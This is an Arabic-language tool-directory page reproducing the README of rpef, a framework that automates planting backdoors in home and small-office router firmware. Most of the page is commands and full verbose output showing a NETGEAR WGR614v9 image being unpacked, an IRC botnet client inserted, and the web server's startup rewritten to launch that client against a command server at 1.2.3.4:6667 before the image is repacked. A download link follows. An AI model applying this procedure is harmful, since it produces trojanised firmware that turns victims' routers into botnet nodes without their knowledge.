Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
rpef — يُجرد ويُسرّع عملية إدراج الأبواب الخلفية في صور البرامج الثابتة الأصلية لأجهزة التوجيه المنزلية/مكاتب الأعمال الصغيرة | Kitploit
أدوات/GitHubGitHub/mncoppola/rpef
أمان الأنظمة المدمجةالاستغلالالهندسة العكسيةما بعد الاستغلالاختبار الاختراقأمان الأجهزة وإنترنت الأشياءالفريق الأحمرتطوير الحمولاتتحليل البرامج الثابتة
GitHubmncoppola/rpef

rpef

يُجرد ويُسرّع عملية إدراج الأبواب الخلفية في صور البرامج الثابتة الأصلية لأجهزة التوجيه المنزلية/مكاتب الأعمال الصغيرة

12429منذ 12 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

إطار عمل استغلال ما بعد الاختراق لأجهزة التوجيه

حاليًا، يتضمن الإطار عددًا من وحدات صور البرامج الثابتة:

root@kitploit:~
'مُتحقق'   - هذه الوحدة مؤكدة العمل ومستقرة.

'غير مُتحقق' - يُعتقد أن هذه الوحدة تعمل أو يجب أن تعمل
               مع القليل من الجهد الإضافي، لكنها تنتظر الاختبار على
               جهاز فعلي.

'قيد الاختبار'    - هذه الوحدة قيد التطوير حاليًا وهي
               غير مستقرة في الوقت الحالي.  يجب على المستخدمين اعتبار هذه
               الوحدة "عمل قيد التقدم."

'عائق'  - أوقفت المشكلات التقدم في هذه الوحدة في الوقت
               الحالي.  قد تكون بعض الأدوات غير المتوفرة أو أعمال الهندسة العكسية
               الكبيرة ضرورية.

للاطلاع على قائمة الخيارات، قم بتشغيل:

root@kitploit:~
./rpef.py -h

للاطلاع على قائمة جميع أهداف البرامج الثابتة المدعومة حاليًا، قم بتشغيل:

root@kitploit:~
./rpef.py -ll

القليل من الهندسة المعمارية

البرنامج النصي مكتوب لـ Python 2.6 وقد يتطلب تثبيت بعض الوحدات. يتم استدعاؤه عادةً على النحو التالي:

root@kitploit:~
./rpef.py <صورة البرنامج الثابت> <ملف الإخراج> <الحمولة>

ويقبل عددًا من المفاتيح الاختيارية (انظر -h).

يخزن دليل rules/ تسلسلًا هرميًا من الدلائل rules/<بائع>/<وحدة>. ترتبط وحدة واحدة بمجموع اختباري واحد للبرامج الثابتة (ليس بموجه محدد) نظرًا لأنه لوحظ أن العديد من أجهزة التوجيه تعمل بنفس البرنامج الثابت تمامًا. داخل كل وحدة يوجد properties.json الذي يخزن اللغة وترتيب العمليات اللازمة لفك التغليف، وإدخال الباب الخلفي، وإعادة تغليف صورة البرنامج الثابت الهدف. يخزن دليل payloads/ الملفات الثنائية المجمعة عبر المنصات الجاهزة للنشر، ويخزن دليل dependencies/ الاختياري ملفات متنوعة للمساعدة في العملية.

يخزن دليل utilities/ ملفات ثنائية x86 مجمعة مسبقًا لأداء مهام مثل تعبئة/فك تعبئة أنظمة الملفات، وضغط/فك ضغط البيانات (التي لا توجد وحدة .py مناسبة لها)، وحساب المجموع الاختباري.

يخزن دليل payloads_src/ الكود المصدري للحمولات نفسها. جميع الحمولات مكتوبة من الصفر لإبقائها صغيرة قدر الإمكان.

الاستخدام

لتوليد صورة برنامج ثابت لـ WGR614v9 مع باب خلفي بعميل بوت نت مع تفاصيل verbose، قم بتشغيل:

root@kitploit:~
./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v

وينبغي أن تستمر العملية على النحو التالي:

root@kitploit:~
$ ./rpef.py WGR614v9-V1.2.30_41.0.44NA.chk WGR614v9-V1.2.30_41.0.44NA_botnet.chk botnet -v
[+] التحقق من المجموع الاختباري
    المجموع الاختباري المحسوب: 767c962037b32a5e800c3ff94a45e85e
    تطابق الهدف: NETGEAR WGR614v9 1.2.30NA (مُتحقق)
[+] استخراج الأجزاء من صورة البرنامج الثابت
    الخطوة 1: استخراج WGR614v9-V1.2.30_41.0.44NA.chk، الإزاحة 58، الحجم 456708 -> /tmp/tmpOaw1tn/headerkernel.bin
    الخطوة 2: استخراج WGR614v9-V1.2.30_41.0.44NA.chk، الإزاحة 456766، الحجم 1476831 -> /tmp/tmpOaw1tn/filesystem.bin
[+] فك تعبئة نظام الملفات
    الخطوة 1: unsquashfs-1.0 /tmp/tmpOaw1tn/filesystem.bin -> /tmp/tmpOaw1tn/extracted_fs
        التنفيذ: utilities/unsquashfs-1.0 -dest /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/filesystem.bin
        
        تم إنشاء 217 ملفًا
        تم إنشاء 27 دليلاً
        تم إنشاء 48 رابطًا رمزيًا
        تم إنشاء 0 جهازًا
        تم إنشاء 0 أنبوب fifo
[+] إدخال الحمولة
    الخطوة 1: حذف /tmp/tmpOaw1tn/extracted_fs/lib/modules/2.4.20/kernel/net/ipv4/opendns/openDNS_hijack.o
    الخطوة 2: نسخ rules/NETGEAR/WGR614v9_1.2.30NA/payloads/botnet /tmp/tmpOaw1tn/extracted_fs/usr/sbin/botnet
    الخطوة 3: نقل /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd.bak
    الخطوة 4: لمس /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
    الخطوة 5: إلحاق النص "#!/bin/msh
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] إدخال مطلوب، عنوان IP لخادم IRC: 1.2.3.4
[+] إدخال مطلوب، منفذ خادم IRC: 6667
[+] إدخال مطلوب، القناة للانضمام (تضمين #): #hax      
[+] إدخال مطلوب، بادئة اسم البوت: toteawesome
    الخطوة 6: إلحاق النص "/usr/sbin/botnet 1.2.3.4 6667 \#hax toteawesome &
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
    الخطوة 7: إلحاق النص "/usr/sbin/httpd.bak
" >> /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
    الخطوة 8: تغيير الصلاحيات 777 /tmp/tmpOaw1tn/extracted_fs/usr/sbin/httpd
[+] بناء نظام الملفات
    الخطوة 1: mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs، حجم الكتلة 65536، نهاية صغيرة -> /tmp/tmpOaw1tn/newfs.bin
        التنفيذ: utilities/mksquashfs-2.1 /tmp/tmpOaw1tn/extracted_fs /tmp/tmpOaw1tn/newfs.bin -b 65536 -root-owned -le
        إنشاء نظام ملفات الإصدار 2.1 ذو النهاية الصغيرة على /tmp/tmpOaw1tn/newfs.bin، حجم الكتلة 65536.
        
        نظام ملفات ذو نهاية صغيرة، حجم كتلة البيانات 65536، بيانات مضغوطة، بيانات وصفية مضغوطة، أجزاء مضغوطة
        حجم نظام الملفات 1442.99 كيلوبايت (1.41 ميجابايت)
            29.38% من حجم نظام الملفات غير المضغوط (4912.18 كيلوبايت)
        حجم جدول inode 2245 بايت (2.19 كيلوبايت)
            33.63% من حجم جدول inode غير المضغوط (6675 بايت)
        حجم جدول الدليل 2322 بايت (2.27 كيلوبايت)
            55.26% من حجم جدول الدليل غير المضغوط (4202 بايت)
        عدد الملفات المكررة التي تم العثور عليها 3
        عدد inodes 293
        عدد الملفات 218
        عدد الأجزاء 22
        عدد الروابط الرمزية 48
        عدد عُقد الأجهزة 0
        عدد عُقد fifo 0
        عدد عُقد المقابس 0
        عدد الدلائل 27
        عدد المعرفات الفريدة للمستخدمين (uids) 1
            root (0)
        عدد معرفات المجموعات (gids) 0
[+] لصق الأجزاء معًا
    الخطوة 1: لمس WGR614v9-V1.2.30_41.0.44NA_botnet.chk
    الخطوة 2: إلحاق الملف /tmp/tmpOaw1tn/headerkernel.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
    الخطوة 3: إلحاق الملف /tmp/tmpOaw1tn/newfs.bin >> WGR614v9-V1.2.30_41.0.44NA_botnet.chk
[+] حشو الصورة ببايتات فارغة
    الخطوة 1: حشو WGR614v9-V1.2.30_41.0.44NA_botnet.chk إلى الحجم 1937408 بـ 0 (0x00)
[+] توليد رأس CHK
    الخطوة 1: packet WGR614v9-V1.2.30_41.0.44NA_botnet.chk rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
        التنفيذ: utilities/packet -k WGR614v9-V1.2.30_41.0.44NA_botnet.chk -b rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/compatible_NA.txt -i rules/NETGEAR/WGR614v9_1.2.30NA/dependencies/ambitCfg.h
[+] إزالة الملفات المؤقتة
    الخطوة 1: حذف الدليل /tmp/tmpOaw1tn/
تنزيل الأداة